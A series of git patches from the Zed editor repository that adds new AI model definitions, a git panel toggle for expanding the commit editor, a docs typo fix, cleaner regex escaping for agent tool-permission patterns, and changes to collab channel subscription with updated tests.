Self::Gpt5_5Pro => "GPT 5.5 Pro", Self::Gpt5_4 => "GPT 5.4", Self::Gpt5_4Pro => "GPT 5.4 Pro", Self::Gpt5_4Mini => "GPT 5.4 Mini", @@ -281,6 +317,10 @@ impl Model { Self::Gemini3_1Pro => "Gemini 3.1 Pro", Self::Gemini3Flash => "Gemini 3 Flash", + Self::DeepSeekV4Pro => "DeepSeek V4 Pro", + Self::DeepSeekV4Flash => "DeepSeek V4 Flash", + Self::Ling2_6FlashFree => "Ling 2.6 Flash Free", + Self::Hy3PreviewFree => "Hy3 Preview Free", Self::MiniMaxM2_5 => "MiniMax M2.5", Self::MiniMaxM2_5Free => "MiniMax M2.5 Free", Self::Glm5 => "GLM 5", @@ -290,6 +330,8 @@ impl Model { Self::MiniMaxM2_7 => "MiniMax M2.7", Self::MimoV2Pro => "MiMo V2 Pro", Self::MimoV2Omni => "MiMo V2 Omni", + Self::MimoV2_5Pro => "MiMo V2.5 Pro", + Self::MimoV2_5 => "MiMo V2.5", Self::Qwen3_5Plus => "Qwen3.5 Plus", Self::Qwen3_6Plus => "Qwen3.6 
Plus", Self::BigPickle => "Big Pickle", @@ -323,7 +365,9 @@ impl Model { | Self::ClaudeHaiku4_5 | Self::Claude3_5Haiku => ApiProtocol::Anthropic, - Self::Gpt5_4 + Self::Gpt5_5 + | Self::Gpt5_5Pro + | Self::Gpt5_4 | Self::Gpt5_4Pro | Self::Gpt5_4Mini | Self::Gpt5_4Nano @@ -341,6 +385,8 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => ApiProtocol::Anthropic, + Self::MiniMaxM2_5Free | Self::Glm5 | Self::Glm5_1 @@ -348,10 +394,14 @@ impl Model { | Self::KimiK2_6 | Self::MimoV2Pro | Self::MimoV2Omni + | Self::MimoV2_5Pro + | Self::MimoV2_5 | Self::Qwen3_5Plus | Self::Qwen3_6Plus | Self::BigPickle - | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat, + | Self::Nemotron3SuperFree + | Self::Ling2_6FlashFree + | Self::Hy3PreviewFree => ApiProtocol::OpenAiChat, Self::Custom { protocol, .. } => *protocol, } @@ -369,6 +419,7 @@ impl Model { Self::Claude3_5Haiku => 200_000, // OpenAI models + Self::Gpt5_5 | Self::Gpt5_5Pro => 1_050_000, Self::Gpt5_4 | Self::Gpt5_4Pro => 1_050_000, Self::Gpt5_4Mini | Self::Gpt5_4Nano => 400_000, Self::Gpt5_3Codex => 400_000, @@ -386,13 +437,17 @@ impl Model { // OpenAI-compatible models Self::MiniMaxM2_7 => 204_800, Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 204_800, - Self::Glm5 | Self::Glm5_1 => 204_800, + Self::Glm5 | Self::Glm5_1 => 202_725, Self::KimiK2_6 | Self::KimiK2_5 => 262_144, - Self::MimoV2Pro => 1_048_576, + Self::MimoV2_5Pro | Self::MimoV2Pro => 1_048_576, + Self::MimoV2_5 => 1_000_000, Self::MimoV2Omni => 262_144, Self::Qwen3_5Plus | Self::Qwen3_6Plus => 262_144, Self::BigPickle => 200_000, Self::Nemotron3SuperFree => 204_800, + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => 1_000_000, + Self::Ling2_6FlashFree => 262_100, + Self::Hy3PreviewFree => 256_000, Self::Custom { max_tokens, .. 
} => *max_tokens, } @@ -411,7 +466,9 @@ impl Model { Self::Claude3_5Haiku => Some(8_192), // OpenAI models - Self::Gpt5_4 + Self::Gpt5_5 + | Self::Gpt5_5Pro + | Self::Gpt5_4 | Self::Gpt5_4Pro | Self::Gpt5_4Mini | Self::Gpt5_4Nano @@ -430,15 +487,22 @@ impl Model { // Google models Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), + // Anthropic-compatible models + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(384_000), + // OpenAI-compatible models Self::MiniMaxM2_7 => Some(131_072), Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(131_072), - Self::Glm5 | Self::Glm5_1 => Some(131_072), + Self::Glm5 | Self::Glm5_1 => Some(32_768), Self::BigPickle => Some(128_000), Self::KimiK2_6 | Self::KimiK2_5 => Some(65_536), Self::Qwen3_5Plus | Self::Qwen3_6Plus => Some(65_536), Self::Nemotron3SuperFree => Some(128_000), - Self::MimoV2Pro | Self::MimoV2Omni => Some(64_000), + Self::MimoV2_5Pro | Self::MimoV2_5 | Self::MimoV2Pro | Self::MimoV2Omni => { + Some(128_000) + } + Self::Ling2_6FlashFree => Some(32_800), + Self::Hy3PreviewFree => Some(64_000), Self::Custom { max_output_tokens, .. @@ -464,7 +528,9 @@ impl Model { | Self::Claude3_5Haiku => true, // OpenAI models support images - Self::Gpt5_4 + Self::Gpt5_5 + | Self::Gpt5_5Pro + | Self::Gpt5_4 | Self::Gpt5_4Pro | Self::Gpt5_4Mini | Self::Gpt5_4Nano @@ -487,6 +553,7 @@ impl Model { Self::KimiK2_6 | Self::KimiK2_5 | Self::MimoV2Omni + | Self::MimoV2_5 | Self::Qwen3_5Plus | Self::Qwen3_6Plus => true, @@ -497,8 +564,14 @@ impl Model { | Self::Glm5_1 | Self::MiniMaxM2_7 | Self::MimoV2Pro + | Self::MimoV2_5Pro | Self::BigPickle - | Self::Nemotron3SuperFree => false, + | Self::Nemotron3SuperFree + | Self::Ling2_6FlashFree + | Self::Hy3PreviewFree => false, + + // DeepSeek models (Anthropic protocol) don't support images + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => false, Self::Custom { protocol, .. 
} => matches!( protocol, @@ -509,6 +582,34 @@ impl Model { ), } } + + pub fn supported_reasoning_effort_levels(&self) -> Option> { + match self { + Self::MimoV2_5Pro + | Self::MimoV2_5 + | Self::MimoV2Pro + | Self::MimoV2Omni + | Self::Hy3PreviewFree => Some(vec![ + ReasoningEffort::Low, + ReasoningEffort::Medium, + ReasoningEffort::High, + ]), + + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(vec![ + ReasoningEffort::Low, + ReasoningEffort::Medium, + ReasoningEffort::High, + ReasoningEffort::XHigh, + ]), + + Self::Custom { + reasoning_effort_levels, + .. + } => reasoning_effort_levels.clone(), + + _ => None, + } + } } /// Stream generate content for Google models via OpenCode. diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 1a16c5264a70bd..619e9d72f84703 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -1,5 +1,6 @@ use crate::merge_from::MergeFrom; use collections::HashMap; +use language_model_core::ReasoningEffort; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings_macros::{MergeFrom, with_fallible_options}; @@ -179,6 +180,8 @@ pub struct OpenCodeAvailableModel { pub subscription: Option, /// Custom Model API URL to use for this model. pub custom_model_api_url: Option, + /// Supported reasoning effort levels, for example `["low", "medium", "high"]. + pub reasoning_effort_levels: Option>, } #[with_fallible_options] diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index fad9ace28aa5da..b38874730ecd5b 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -663,6 +663,7 @@ The Zed agent comes pre-configured with OpenCode models. 
If you wish to use newer "max_tokens": 123456, "max_output_tokens": 98765, "protocol": "openai_chat", + "reasoning_effort_levels": ["low", "medium", "high"], "subscription": "go", "custom_model_api_url": "https://example.com/zen" } @@ -679,6 +680,7 @@ The available configuration options for custom models are: - `max_tokens` (required): maximum model context window size, for example `1000000` - `max_output_tokens` (optional): maximum tokens the model can generate, for example `64000` - `protocol` (required): model API protocol, one of `"anthropic"`, `"openai_responses"`, `"openai_chat"`, or `"google"` +- `reasoning_effort_levels` (optional): list of supported reasoning effort levels, for example `["low", "medium", "high"]`. The last value in the list is used as the default - `subscription` (optional): `"zen"`, `"go"`, or `"free"` (defaults to `"zen"`) - `custom_model_api_url` (optional): custom API base URL to use instead of the default OpenCode API From a4f0b354b82f19a22534cca309b692dcfb62f741 Mon Sep 17 00:00:00 2001 From: Dino Date: Tue, 28 Apr 2026 17:09:23 +0100 Subject: [PATCH 080/231] git_panel: Add support for vertically expanding the commit editor (#55043) Using the existing commit editor in the Git Panel to type out longer commit messages has been somewhat hard. I believe this happens because it takes a very small portion of the UI which, unfortunately, when `git: expand commit editor` is used, a modal ends up taking the center of the editor, making it impossible to have the commit editor open on the side, while the `git: diff` view is open. As such, this Pull Request introduces a new `git::ToggleFillCommitEditor` action that allows users to update the commit editor's height so as to take as much vertical space as possible, hiding the entries status and simply rendering the Git Panel's footer.
This makes it easier to be able to write longer commit messages while still having the `git: branch diff` on the side, something that's very complicated with the default number of lines in the commit editor and impossible using the `CommitModal`. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Added a `git::ToggleFillCommitEditor` action that expands the commit editor to fill the git panel's available vertical space. --------- Co-authored-by: Danilo Leal Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> --- assets/keymaps/default-linux.json | 2 + assets/keymaps/default-macos.json | 1 + assets/keymaps/default-windows.json | 2 + crates/git/src/git.rs | 3 + crates/git_ui/src/git_panel.rs | 177 +++++++++++++++++++++++----- 5 files changed, 157 insertions(+), 28 deletions(-) diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index a72cd743596d0d..ba7f514766ee55 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -1071,6 +1071,8 @@ "ctrl-shift-enter": "git::Amend", "alt-up": "git_panel::FocusChanges", "alt-l": "git::GenerateCommitMessage", + "shift-escape": "git::ExpandCommitEditor", + "alt-shift-escape": "git::ToggleFillCommitEditor", }, }, { diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 4f26eeeb8b3d0a..11750aa74148e7 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -1102,6 +1102,7 @@ "shift-tab": "git_panel::FocusChanges", "alt-up": "git_panel::FocusChanges", "shift-escape": "git::ExpandCommitEditor", + "alt-shift-escape": 
"git::ToggleFillCommitEditor", "alt-tab": "git::GenerateCommitMessage", }, }, diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 8d60a68dbc26b6..2526a9412c6775 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1069,6 +1069,8 @@ "ctrl-shift-enter": "git::Amend", "alt-up": "git_panel::FocusChanges", "alt-l": "git::GenerateCommitMessage", + "shift-escape": "git::ExpandCommitEditor", + "alt-shift-escape": "git::ToggleFillCommitEditor", }, }, { diff --git a/crates/git/src/git.rs b/crates/git/src/git.rs index debb7649ab7cc7..d5274d24b513c8 100644 --- a/crates/git/src/git.rs +++ b/crates/git/src/git.rs @@ -94,6 +94,9 @@ actions!( Cancel, /// Expands the commit message editor. ExpandCommitEditor, + /// Toggles whether the commit message editor fills all the available + /// vertical space within the git panel. + ToggleFillCommitEditor, /// Generates a commit message using AI. GenerateCommitMessage, /// Initializes a new git repository. 
diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 62f8edcfbd87fc..f0900b56bccad1 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -16,7 +16,7 @@ use askpass::AskPassDelegate; use collections::{BTreeMap, HashMap, HashSet}; use db::kvp::KeyValueStore; use editor::{ - Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset, + Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset, SizingBehavior, actions::ExpandAllDiffHunks, }; use editor::{EditorStyle, RewrapOptions}; @@ -34,7 +34,7 @@ use git::status::{DiffStat, StageStatus}; use git::{Amend, Signoff, ToggleStaged, repository::RepoPath, status::FileStatus}; use git::{ ExpandCommitEditor, GitHostingProviderRegistry, RestoreTrackedFiles, StageAll, StashAll, - StashApply, StashPop, TrashUntrackedFiles, UnstageAll, + StashApply, StashPop, ToggleFillCommitEditor, TrashUntrackedFiles, UnstageAll, }; use gpui::{ Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, Empty, Entity, @@ -247,6 +247,13 @@ pub fn register(workspace: &mut Workspace) { workspace.register_action(|workspace, _: &ExpandCommitEditor, window, cx| { CommitModal::toggle(workspace, None, window, cx) }); + workspace.register_action(|workspace, _: &ToggleFillCommitEditor, window, cx| { + if let Some(panel) = workspace.panel::(cx) { + panel.update(cx, |panel, cx| { + panel.toggle_fill_commit_editor(&Default::default(), window, cx) + }); + } + }); workspace.register_action(|workspace, _: &git::Init, window, cx| { if let Some(panel) = workspace.panel::(cx) { panel.update(cx, |panel, cx| panel.git_init(window, cx)); @@ -619,6 +626,8 @@ impl TruncatedPatch { pub struct GitPanel { pub(crate) active_repository: Option>, pub(crate) commit_editor: Entity, + /// Whether the commit editor should fill the vertical height of the panel. 
+ commit_editor_expanded: bool, conflicted_count: usize, conflicted_staged_count: usize, add_coauthors: bool, @@ -809,6 +818,7 @@ impl GitPanel { let mut this = Self { active_repository, commit_editor, + commit_editor_expanded: false, conflicted_count: 0, conflicted_staged_count: 0, add_coauthors: true, @@ -4259,9 +4269,34 @@ impl GitPanel { } } + fn toggle_fill_commit_editor( + &mut self, + _: &ToggleFillCommitEditor, + _window: &mut Window, + cx: &mut Context, + ) { + self.commit_editor_expanded = !self.commit_editor_expanded; + self.commit_editor.update(cx, |editor, _cx| { + if self.commit_editor_expanded { + editor.set_mode(EditorMode::Full { + scale_ui_elements_with_buffer_font_size: false, + show_active_line_background: false, + sizing_behavior: SizingBehavior::ExcludeOverscrollMargin, + }) + } else { + editor.set_mode(EditorMode::AutoHeight { + min_lines: MAX_PANEL_EDITOR_LINES, + max_lines: Some(MAX_PANEL_EDITOR_LINES), + }) + } + }); + + cx.notify(); + } + fn expand_commit_editor( &mut self, - _: &git::ExpandCommitEditor, + _: &ExpandCommitEditor, window: &mut Window, cx: &mut Context, ) { @@ -4375,10 +4410,7 @@ impl GitPanel { let active_repository = self.active_repository.clone()?; let panel_editor_style = panel_editor_style(true, window, cx); let enable_coauthors = self.render_co_authors(cx); - let editor_focus_handle = self.commit_editor.focus_handle(cx); - let expand_tooltip_focus_handle = editor_focus_handle; - let branch = active_repository.read(cx).branch.clone(); let head_commit = active_repository.read(cx).head_commit.clone(); @@ -4414,6 +4446,7 @@ impl GitPanel { }; let footer = v_flex() + .when(self.commit_editor_expanded, |this| this.flex_1().min_h_0()) .child(PanelRepoFooter::new( display_name, branch, @@ -4448,7 +4481,10 @@ impl GitPanel { .cursor_text() .relative() .w_full() - .h(max_height + footer_size) + .when(self.commit_editor_expanded, |this| this.flex_1().min_h_0()) + .when(!self.commit_editor_expanded, |this| { + this.h(max_height + 
footer_size) + }) .border_t_1() .border_color(if title_exceeds_limit { cx.theme().status().warning_border @@ -4486,6 +4522,9 @@ impl GitPanel { ) .child( div() + .when(self.commit_editor_expanded, |this| { + this.flex_1().min_h_0().pb(footer_size) + }) .pr_2p5() .on_action(|&zed_actions::editor::MoveUp, _, cx| { cx.stop_propagation(); @@ -4500,19 +4539,21 @@ impl GitPanel { .absolute() .top_2() .right_2() - .opacity(0.5) - .hover(|this| this.opacity(1.0)) + .gap_px() + .opacity(0.6) + .hover(|s| s.opacity(1.0)) .child( - panel_icon_button("expand-commit-editor", IconName::Maximize) + panel_icon_button("expand-commit-editor", IconName::MaximizeAlt) .icon_size(IconSize::Small) - .size(ui::ButtonSize::Default) - .tooltip(move |_window, cx| { - Tooltip::for_action_in( - "Open Commit Modal", - &git::ExpandCommitEditor, - &expand_tooltip_focus_handle, - cx, - ) + .tooltip({ + move |_window, cx| { + Tooltip::for_action_in( + "Open Commit Modal", + &git::ExpandCommitEditor, + &editor_focus_handle, + cx, + ) + } }) .on_click(cx.listener({ move |_, _, window, cx| { @@ -4522,7 +4563,36 @@ impl GitPanel { ) } })), - ), + ) + .child({ + let (icon, label) = if self.commit_editor_expanded { + (IconName::Minimize, "Collapse Commit Editor") + } else { + (IconName::Maximize, "Expand Commit Editor") + }; + let focus_handle = self.focus_handle.clone(); + + panel_icon_button("fill-commit-editor", icon) + .icon_size(IconSize::Small) + .tooltip({ + move |_window, cx| { + Tooltip::for_action_in( + label, + &git::ToggleFillCommitEditor, + &focus_handle, + cx, + ) + } + }) + .on_click(cx.listener({ + move |_, _, window, cx| { + window.dispatch_action( + git::ToggleFillCommitEditor.boxed_clone(), + cx, + ) + } + })) + }), ), ); @@ -5932,15 +6002,22 @@ impl Render for GitPanel { .child( v_flex() .size_full() - .children(self.render_panel_header(window, cx)) - .map(|this| { - if let Some(repo) = self.active_repository.clone() - && has_entries - { - 
this.child(self.render_entries(has_write_access, repo, window, cx)) - } else { - this.child(self.render_empty_state(cx).into_any_element()) - } + .when(!self.commit_editor_expanded, |this| { + this.children(self.render_panel_header(window, cx)) + .map(|this| { + if let Some(repo) = self.active_repository.clone() + && has_entries + { + this.child(self.render_entries( + has_write_access, + repo, + window, + cx, + )) + } else { + this.child(self.render_empty_state(cx).into_any_element()) + } + }) }) .children(self.render_footer(window, cx)) .when(self.amend_pending, |this| { @@ -8275,4 +8352,48 @@ mod tests { ); }); } + + #[gpui::test] + async fn test_fill_commit_editor_toggle(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/root", + json!({ "project": { ".git": {}, "src": { "main.rs": "fn main() {}" } } }), + ) + .await; + + let project = Project::test(fs.clone(), [Path::new(path!("/root/project"))], cx).await; + let window_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window_handle + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window_handle.into(), cx); + cx.executor().run_until_parked(); + + let panel = workspace.update_in(cx, GitPanel::new); + + panel.update_in(cx, |panel, window, cx| { + assert!(!panel.commit_editor_expanded); + assert!(matches!( + panel.commit_editor.read(cx).mode().clone(), + EditorMode::AutoHeight { .. } + )); + + panel.toggle_fill_commit_editor(&ToggleFillCommitEditor, window, cx); + assert!(panel.commit_editor_expanded); + assert!(matches!( + panel.commit_editor.read(cx).mode().clone(), + EditorMode::Full { .. } + )); + + panel.toggle_fill_commit_editor(&ToggleFillCommitEditor, window, cx); + assert!(!panel.commit_editor_expanded); + assert!(matches!( + panel.commit_editor.read(cx).mode().clone(), + EditorMode::AutoHeight { .. 
} + )); + }); + } } From 48e898eb1b2a11182b2de6063a18f2832c4629dc Mon Sep 17 00:00:00 2001 From: vladislav doster Date: Tue, 28 Apr 2026 14:18:44 -0500 Subject: [PATCH 081/231] docs: Fix typo in `EXTRACTION.md` (#55106) Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - Corrected a typo in the instructions regarding the 'pattern' format --- extensions/EXTRACTION.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/extensions/EXTRACTION.md b/extensions/EXTRACTION.md index 2bcc8e35d58933..5f3d74073366bc 100644 --- a/extensions/EXTRACTION.md +++ b/extensions/EXTRACTION.md @@ -30,7 +30,7 @@ cd $LANGNAME 2. Create an expressions.txt file somewhere (e.g. `~/projects/$LANGNAME.txt`) -This file takes the form of `patern==>replacement`, where the replacement is optional. +This file takes the form of `pattern==>replacement`, where the replacement is optional. Note whitespace matters so `ruby: ==>` is removing the `ruby:` prefix from a commit messages and adding a space after `==> ` means the replacement begins with a space. Regex capture groups are numbered `\1`, `\2`, etc. See: [Git Filter Repo Docs](https://htmlpreview.github.io/?https://github.com/newren/git-filter-repo/blob/docs/html/git-filter-repo.html) for more. From 76883d04055e0b1224d4cf62e9f1c9997695944d Mon Sep 17 00:00:00 2001 From: Matt Van Horn Date: Tue, 28 Apr 2026 14:57:41 -0700 Subject: [PATCH 082/231] agent: Stop over-escaping dashes in tool_permissions regex patterns (#51603) Fixes #51537 `regex::escape()` escapes dashes, but dashes are only special inside `[]` character classes in regex. 
This means tool_permissions patterns end up with unnecessary backslashes: **Before:** `^https?://typescript\-eslint\.io`, `^git\-lfs\s+pull(\s|$)` **After:** `^https?://typescript-eslint\.io`, `^git-lfs\s+pull(\s|$)` The fix adds a small `escape_for_pattern()` helper that calls `regex::escape()` then strips the unnecessary dash escaping via `.replace("\\-", "-")`. This is applied to all five call sites in `pattern_extraction.rs`. Tests updated to expect unescaped dashes, plus a new `test_dashes_are_not_escaped` test covering terminal commands, URLs, and paths with dashes. This PR was developed with AI assistance. Release Notes: - Fixed unnecessary escaping of dashes in agent tool permission patterns (e.g. `typescript\-eslint` is now `typescript-eslint`) --------- Co-authored-by: Matt Van Horn <455140+mvanhorn@users.noreply.github.com> --- crates/agent/src/pattern_extraction.rs | 41 +++++++++++++++++++++----- 1 file changed, 33 insertions(+), 8 deletions(-) diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 7015d69827d728..3b1b93c64511a8 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -3,6 +3,15 @@ use shell_command_parser::{extract_commands, extract_terminal_command_prefix}; use std::path::{Path, PathBuf}; use url::Url; +/// Escapes a string for use in a regex pattern, but leaves dashes unescaped. +/// +/// `regex::escape()` escapes dashes, but they are only special inside `[]` +/// character classes. Leaving them unescaped produces cleaner patterns +/// (e.g. `^git-lfs\s+pull` instead of `^git\-lfs\s+pull`). +fn escape_for_pattern(text: &str) -> String { + regex::escape(text).replace("\\-", "-") +} + /// Normalize path separators to forward slashes for consistent cross-platform patterns. 
fn normalize_separators(path_str: &str) -> String { path_str.replace('\\', "/") @@ -64,14 +73,14 @@ pub fn extract_terminal_pattern(command: &str) -> Option { match tokens.as_slice() { [] => None, - [single] => Some(format!("^{}\\b", regex::escape(single))), + [single] => Some(format!("^{}\\b", escape_for_pattern(single))), [rest @ .., last] => Some(format!( "^{}\\s+{}(\\s|$)", rest.iter() - .map(|token| regex::escape(token)) + .map(|token| escape_for_pattern(token)) .collect::>() .join("\\s+"), - regex::escape(last) + escape_for_pattern(last) )), } } @@ -116,7 +125,7 @@ pub fn extract_path_pattern(path: &str) -> Option { if parent_str.is_empty() || parent_str == "/" { return None; } - Some(format!("^{}/", regex::escape(&parent_str))) + Some(format!("^{}/", escape_for_pattern(&parent_str))) } pub fn extract_path_pattern_display(path: &str) -> Option { @@ -156,7 +165,7 @@ pub fn extract_copy_move_pattern(input: &str) -> Option { if common_str.is_empty() || common_str == "/" { return None; } - Some(format!("^{}/", regex::escape(&common_str))) + Some(format!("^{}/", escape_for_pattern(&common_str))) } pub fn extract_copy_move_pattern_display(input: &str) -> Option { @@ -172,7 +181,7 @@ pub fn extract_copy_move_pattern_display(input: &str) -> Option { pub fn extract_url_pattern(url: &str) -> Option { let parsed = Url::parse(url).ok()?; let domain = parsed.host_str()?; - Some(format!("^https?://{}", regex::escape(domain))) + Some(format!("^https?://{}", escape_for_pattern(domain))) } pub fn extract_url_pattern_display(url: &str) -> Option { @@ -201,7 +210,7 @@ mod tests { ); assert_eq!( extract_terminal_pattern("git-lfs pull"), - Some("^git\\-lfs\\s+pull(\\s|$)".to_string()) + Some("^git-lfs\\s+pull(\\s|$)".to_string()) ); assert_eq!( extract_terminal_pattern("my_script arg"), @@ -244,7 +253,7 @@ mod tests { ); assert_eq!( extract_terminal_pattern("PAGER='less -R' git log"), - Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + Some("^PAGER='less 
-R'\\s+git\\s+log(\\s|$)".to_string()) ); // Path-like commands are rejected @@ -396,6 +405,22 @@ mod tests { ); } + #[test] + fn test_dashes_are_not_escaped() { + assert_eq!( + extract_terminal_pattern("git-lfs pull"), + Some("^git-lfs\\s+pull(\\s|$)".to_string()) + ); + assert_eq!( + extract_url_pattern("https://typescript-eslint.io/rules/no-unused-vars"), + Some("^https?://typescript-eslint\\.io".to_string()) + ); + assert_eq!( + extract_path_pattern("/my-project/sub-dir/file.rs"), + Some("^/my-project/sub-dir/".to_string()) + ); + } + #[test] fn test_special_chars_are_escaped() { assert_eq!( From 5770e1d6aebbf210a3ecf834589e2fb7e278b123 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Wed, 29 Apr 2026 00:12:38 +0200 Subject: [PATCH 083/231] Fix version check (#55032) Release Notes: - N/A --- crates/collab/src/rpc.rs | 8 -------- crates/collab/src/rpc/connection_pool.rs | 6 ------ .../tests/integration/channel_buffer_tests.rs | 5 +++++ .../collab/tests/integration/channel_tests.rs | 10 ++++++++++ crates/collab/tests/integration/test_server.rs | 17 ++++++++++++++++- 5 files changed, 31 insertions(+), 15 deletions(-) diff --git a/crates/collab/src/rpc.rs b/crates/collab/src/rpc.rs index 1294b06c8e553f..2fbbda032cc7ab 100644 --- a/crates/collab/src/rpc.rs +++ b/crates/collab/src/rpc.rs @@ -947,10 +947,6 @@ impl Server { )?; } - if should_auto_subscribe_to_channels(&zed_version) { - subscribe_user_to_channels(user.id, session).await?; - } - if let Some(incoming_call) = self.app_state.db.incoming_call_for_user(user.id).await? 
{ @@ -2748,10 +2744,6 @@ async fn remove_contact( Ok(()) } -fn should_auto_subscribe_to_channels(version: &ZedVersion) -> bool { - version.0.minor < 139 -} - async fn subscribe_to_channels( _: proto::SubscribeToChannels, session: MessageContext, diff --git a/crates/collab/src/rpc/connection_pool.rs b/crates/collab/src/rpc/connection_pool.rs index 171dea37526e81..2dc790ea2321e9 100644 --- a/crates/collab/src/rpc/connection_pool.rs +++ b/crates/collab/src/rpc/connection_pool.rs @@ -36,12 +36,6 @@ impl ZedVersion { return false; } - // Since we hotfixed the changes to no longer connect to Collab automatically to Preview, we also need to reject - // versions in the range [v0.199.0, v0.199.1]. - if self.0 >= Version::new(0, 199, 0) && self.0 < Version::new(0, 199, 2) { - return false; - } - true } } diff --git a/crates/collab/tests/integration/channel_buffer_tests.rs b/crates/collab/tests/integration/channel_buffer_tests.rs index dd8ae9a2c02cfa..b40ce13c8753c1 100644 --- a/crates/collab/tests/integration/channel_buffer_tests.rs +++ b/crates/collab/tests/integration/channel_buffer_tests.rs @@ -657,6 +657,11 @@ async fn test_channel_buffer_changes( deterministic.advance_clock(ACKNOWLEDGE_DEBOUNCE_INTERVAL); server .simulate_long_connection_interruption(client_b.peer_id().unwrap(), deterministic.clone()); + + // Re-subscribe to channels after reconnection (simulates collab panel re-rendering) + client_b.initialize_channel_store(cx_b); + deterministic.run_until_parked(); + channel_store_b.read_with(cx_b, |channel_store, _| { assert!(!channel_store.has_channel_buffer_changed(channel_id)) }); diff --git a/crates/collab/tests/integration/channel_tests.rs b/crates/collab/tests/integration/channel_tests.rs index b42bb32f874f51..5de3984ece5e42 100644 --- a/crates/collab/tests/integration/channel_tests.rs +++ b/crates/collab/tests/integration/channel_tests.rs @@ -24,6 +24,11 @@ async fn test_core_channels( let client_a = server.create_client(cx_a, "user_a").await; let client_b = 
server.create_client(cx_b, "user_b").await; + // Subscribe to channels (simulates opening the collab panel) + client_a.initialize_channel_store(cx_a); + client_b.initialize_channel_store(cx_b); + executor.run_until_parked(); + let channel_a_id = client_a .channel_store() .update(cx_a, |channel_store, cx| { @@ -290,6 +295,11 @@ async fn test_core_channels( server.allow_connections(); executor.advance_clock(RECEIVE_TIMEOUT + RECONNECT_TIMEOUT); + + // Re-subscribe to channels after reconnection (simulates collab panel re-rendering) + client_a.initialize_channel_store(cx_a); + executor.run_until_parked(); + assert_channels( client_a.channel_store(), cx_a, diff --git a/crates/collab/tests/integration/test_server.rs b/crates/collab/tests/integration/test_server.rs index f077f5f35cb611..33bc373d058019 100644 --- a/crates/collab/tests/integration/test_server.rs +++ b/crates/collab/tests/integration/test_server.rs @@ -437,7 +437,12 @@ impl TestServer { admin: (&TestClient, &mut TestAppContext), members: &mut [(&TestClient, &mut TestAppContext)], ) -> ChannelId { - let (_, admin_cx) = admin; + let (admin_client, admin_cx) = admin; + + // Subscribe to channels (simulates opening the collab panel) + admin_client.initialize_channel_store(admin_cx); + admin_cx.executor().run_until_parked(); + let channel_id = admin_cx .read(ChannelStore::global) .update(admin_cx, |channel_store, cx| { @@ -447,6 +452,10 @@ impl TestServer { .unwrap(); for (member_client, member_cx) in members { + // Subscribe member to channels (simulates opening the collab panel) + member_client.initialize_channel_store(member_cx); + member_cx.executor().run_until_parked(); + admin_cx .read(ChannelStore::global) .update(admin_cx, |channel_store, cx| { @@ -665,6 +674,12 @@ impl TestClient { .await; } + /// Subscribe to channels. In production this happens when the user opens the collab panel. 
